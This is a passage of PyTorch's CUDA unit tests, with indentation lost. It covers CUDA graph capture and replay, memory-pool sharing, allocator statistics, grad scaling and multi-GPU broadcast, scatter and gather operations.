dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
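# Design note (hedged summary of the share_mem modes above): passing g0.pool() or a shared
# torch.cuda.graph_pool_handle() into capture_begin() makes g1 capture into g0's private
# memory pool, so g1 reuses g0's cached blocks instead of reserving its own; the assertion
# above expects the sharing runs to reserve exactly kSmallBuffer fewer bytes than the
# non-sharing run.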
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
g2 = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
# If share_mem is True, g2's capture should have reused c's memory for f. We replayed g2 then g1,
# so we expect g1's captured "e = c + 3" mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda.CUDAGraph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
# potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
# mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
# event, which will cause the capture to error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
# A dummy allocation triggers process_events, which should successfully process b's end-of-life event.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
# In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
torch.cuda.empty_cache()
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
# warmup
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
torch.cuda.current_stream().wait_stream(s)
opt.zero_grad(set_to_none=True)
# capture
with torch.cuda.graph(g):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_make_graphed_callables(self):
torch.manual_seed(5)
torch.cuda.manual_seed(5)
N, D_in, H, D_out = 640, 4096, 2048, 1024
models = []
for _ in range(2):
model_section1 = torch.nn.Sequential(torch.nn.Linear(D_in, H),
torch.nn.Dropout(p=0.1)).cuda()
model_section2 = torch.nn.Sequential(torch.nn.Linear(H, D_out),
torch.nn.Dropout(p=0.2)).cuda()
models.append(torch.nn.Sequential(model_section1, model_section2))
model_graphed = models[0]
model_control = models[1]
model_graphed.load_state_dict(model_control.state_dict())
opt_graphed = torch.optim.SGD(model_graphed.parameters(), lr=0.1)
opt_control = torch.optim.SGD(model_control.parameters(), lr=0.1)
x = torch.randn(N, D_in, device='cuda')
h = torch.randn(N, H, device='cuda', requires_grad=True)
y_pred = torch.randn(N, D_out, device='cuda', requires_grad=True)
y = torch.randn(N, D_out, device='cuda')
loss_fn_control = torch.nn.functional.mse_loss
relu_control = torch.nn.functional.relu
# This is a good stress test. It graphs four callables: two Modules and two python functions.
model_graphed[0], model_graphed[1], relu_graphed, loss_fn_graphed = \
torch.cuda.make_graphed_callables((model_graphed[0], model_graphed[1], relu_control, loss_fn_control),
((x,), (h,), (y_pred,), (y_pred, y)))
real_inputs = [torch.rand_like(x) for _ in range(10)]
real_targets = [torch.rand_like(y) for _ in range(10)]
for m, opt, relu, loss_fn in zip((model_graphed, model_control),
(opt_graphed, opt_control),
(relu_graphed, relu_control),
(loss_fn_graphed, loss_fn_control)):
# Resets RNG states before iterations for graphed and ungraphed models,
# so dropout math should be bitwise identical for both.
torch.manual_seed(5)
torch.cuda.manual_seed(5)
for data, target in zip(real_inputs, real_targets):
opt.zero_grad(set_to_none=True)
y_pred = m(data)
y_pred = relu(y_pred)
loss = loss_fn(y_pred, target)
loss.backward()
opt.step()
for p, pc in zip(model_graphed.parameters(), model_control.parameters()):
self.assertEqual(p, pc)
# We graphed the models in training mode. Eval should still run ungraphed.
model_graphed.eval()
model_control.eval()
self.assertEqual(model_graphed(real_inputs[0]), model_control(real_inputs[0]))
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
running_mean=None, running_var=None , momentum=.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
